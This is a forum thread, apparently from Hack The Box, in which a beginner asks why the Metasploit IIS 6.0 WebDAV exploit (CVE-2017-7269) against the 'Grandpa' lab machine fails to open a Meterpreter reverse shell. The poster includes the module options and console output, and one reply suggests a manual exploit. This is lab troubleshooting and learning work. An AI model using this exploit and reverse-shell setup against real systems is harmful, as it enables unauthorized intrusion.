Grandpa - Reverseshell in metasploit not working despite writeups

Hi people.

I’m new to htb so apologies in advance for wrongful usage of tools or terms, I am here to learn.
I attempted to get into grandpa and discovered the IIS 6.0 vulnerability in CVE-2017-7269, however despite many writeups featuring the windows/iis/iis_webdav_scstoragepathfromurl exploit, I’ve been unable to get a shell on the machine.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

Name Current Setting Required Description

MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 10.10.10.14 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Microsoft Windows Server 2003 R2 SP2 x86

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

[] Started reverse TCP handler on 10.10.14.5:4444
[
] Trying path length 3 to 60 …
[*] Exploit completed, but no session was created.

I’m running a Parrot Sec Mate with metasploit 6.0.2-0parrot1. I attempted the same thing on a Kali VM and got the same error.

Any help or hints would be much appreciated.
Thanks in advance!

MSF is very hit or miss. I’d suggest trying the manual version of the exploit and seeing if that works.

Type your comment> @sparkla said:

Type your comment> @LMAY75 said: